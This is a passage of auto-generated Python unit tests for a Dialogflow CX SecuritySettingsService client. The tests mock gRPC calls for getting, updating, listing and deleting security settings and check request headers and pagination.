credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
client.get_security_settings()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.GetSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_get_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.GetSecuritySettingsRequest):
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
))
response = await client.get_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.GetSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_get_security_settings_async_from_dict():
await test_get_security_settings_async(request_type=dict)
def test_get_security_settings_field_headers():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.GetSecuritySettingsRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
call.return_value = security_settings.SecuritySettings()
client.get_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_get_security_settings_field_headers_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.GetSecuritySettingsRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings())
await client.get_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_get_security_settings_flattened():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.SecuritySettings()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_security_settings(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_get_security_settings_flattened_error():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_security_settings(
security_settings.GetSecuritySettingsRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_get_security_settings_flattened_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.SecuritySettings()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_security_settings(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_get_security_settings_flattened_error_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_security_settings(
security_settings.GetSecuritySettingsRequest(),
name='name_value',
)
def test_update_security_settings(transport: str = 'grpc', request_type=gcdc_security_settings.UpdateSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
retention_window_days=2271,
)
response = client.update_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gcdc_security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_update_security_settings_from_dict():
test_update_security_settings(request_type=dict)
def test_update_security_settings_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
client.update_security_settings()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_update_security_settings_async(transport: str = 'grpc_asyncio', request_type=gcdc_security_settings.UpdateSecuritySettingsRequest):
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
))
response = await client.update_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gcdc_security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_update_security_settings_async_from_dict():
await test_update_security_settings_async(request_type=dict)
def test_update_security_settings_field_headers():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gcdc_security_settings.UpdateSecuritySettingsRequest()
request.security_settings.name = 'security_settings.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
call.return_value = gcdc_security_settings.SecuritySettings()
client.update_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'security_settings.name=security_settings.name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_update_security_settings_field_headers_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gcdc_security_settings.UpdateSecuritySettingsRequest()
request.security_settings.name = 'security_settings.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
await client.update_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'security_settings.name=security_settings.name/value',
) in kw['metadata']
def test_update_security_settings_flattened():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_security_settings(
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
def test_update_security_settings_flattened_error():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_security_settings(
gcdc_security_settings.UpdateSecuritySettingsRequest(),
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
@pytest.mark.asyncio
async def test_update_security_settings_flattened_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_security_settings(
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
@pytest.mark.asyncio
async def test_update_security_settings_flattened_error_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_security_settings(
gcdc_security_settings.UpdateSecuritySettingsRequest(),
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
def test_list_security_settings(transport: str = 'grpc', request_type=security_settings.ListSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.ListSecuritySettingsResponse(
next_page_token='next_page_token_value',
)
response = client.list_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.ListSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListSecuritySettingsPager)
assert response.next_page_token == 'next_page_token_value'
def test_list_security_settings_from_dict():
test_list_security_settings(request_type=dict)
def test_list_security_settings_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
client.list_security_settings()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.ListSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_list_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.ListSecuritySettingsRequest):
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse(
next_page_token='next_page_token_value',
))
response = await client.list_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.ListSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListSecuritySettingsAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_list_security_settings_async_from_dict():
await test_list_security_settings_async(request_type=dict)
def test_list_security_settings_field_headers():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.ListSecuritySettingsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
call.return_value = security_settings.ListSecuritySettingsResponse()
client.list_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_list_security_settings_field_headers_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.ListSecuritySettingsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse())
await client.list_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_security_settings_flattened():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.ListSecuritySettingsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_security_settings(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_list_security_settings_flattened_error():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_security_settings(
security_settings.ListSecuritySettingsRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_list_security_settings_flattened_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.ListSecuritySettingsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_security_settings(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_security_settings_flattened_error_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_security_settings(
security_settings.ListSecuritySettingsRequest(),
parent='parent_value',
)
def test_list_security_settings_pager():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
next_page_token='abc',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[],
next_page_token='def',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
],
next_page_token='ghi',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('parent', ''),
)),
)
pager = client.list_security_settings(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, security_settings.SecuritySettings)
for i in results)
def test_list_security_settings_pages():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
next_page_token='abc',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[],
next_page_token='def',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
],
next_page_token='ghi',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
),
RuntimeError,
)
pages = list(client.list_security_settings(request={}).pages)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_security_settings_async_pager():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
next_page_token='abc',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[],
next_page_token='def',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
],
next_page_token='ghi',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
),
RuntimeError,
)
async_pager = await client.list_security_settings(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, security_settings.SecuritySettings)
for i in responses)
@pytest.mark.asyncio
async def test_list_security_settings_async_pages():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
next_page_token='abc',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[],
next_page_token='def',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
],
next_page_token='ghi',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_security_settings(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
def test_delete_security_settings(transport: str = 'grpc', request_type=security_settings.DeleteSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.DeleteSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_security_settings_from_dict():
test_delete_security_settings(request_type=dict)
def test_delete_security_settings_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
client.delete_security_settings()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.DeleteSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_delete_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.DeleteSecuritySettingsRequest):
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.DeleteSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_security_settings_async_from_dict():
await test_delete_security_settings_async(request_type=dict)
def test_delete_security_settings_field_headers():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.DeleteSecuritySettingsRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
call.return_value = None
client.delete_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_delete_security_settings_field_headers_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.DeleteSecuritySettingsRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_delete_security_settings_flattened():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_security_settings(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_delete_security_settings_flattened_error():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_security_settings(
security_settings.DeleteSecuritySettingsRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_delete_security_settings_flattened_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_security_settings(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_delete_security_settings_flattened_error_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_security_settings(
security_settings.DeleteSecuritySettingsRequest(),
name='name_value',
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.SecuritySettingsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.SecuritySettingsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = SecuritySettingsServiceClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.SecuritySettingsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = SecuritySettingsServiceClient(
client_options={"scopes": ["1", "2"]},
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.SecuritySettingsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = SecuritySettingsServiceClient(transport=transport)
